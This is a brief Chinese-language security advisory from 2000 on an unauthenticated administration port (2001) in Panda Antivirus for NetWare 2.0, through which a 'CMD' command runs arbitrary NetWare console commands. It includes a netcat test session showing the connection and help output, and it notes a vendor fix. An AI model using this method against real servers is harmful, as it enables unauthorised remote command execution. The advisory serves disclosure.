发布日期：2000-06-20
更新日期：2000-06-20

受影响系统：

Panda Antivirus for NetWare 2.0
   - Novell Netware 5.1
   - Novell Netware 5.0

描述：

---

Panda Antivirus for NetWare缺省使用2001端口来作为管理端口。任何远程用户都可以
连接到这个端口并不需要进行身份验证，用户可以使用'CMD'命令来执行任意的NetWare命令。

<* 来源：Ian Vitek （ian.vitek@infosec.se） *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

foo:/# nc server 2001

Panda Antivirus NetWare Servers
Copyright 1998(c) Panda Software
Version 2.00
Last upgrade: 10/04/2000

FS1 (#1): help
ANALYZE             CMD                 HELP                LOAD
RELOADCFG           UPDATE              UNLOAD              VER
FS1 (#1): help cmd
Make a console command of Netware
CMD [Command NetWare]
Example: CMD LOAD MONITOR


建议：

---

PCM International 声称在GVI disk(M6/A00)中已经修复了这个漏洞

浏览次数：5860
严重程度：0（网友投票）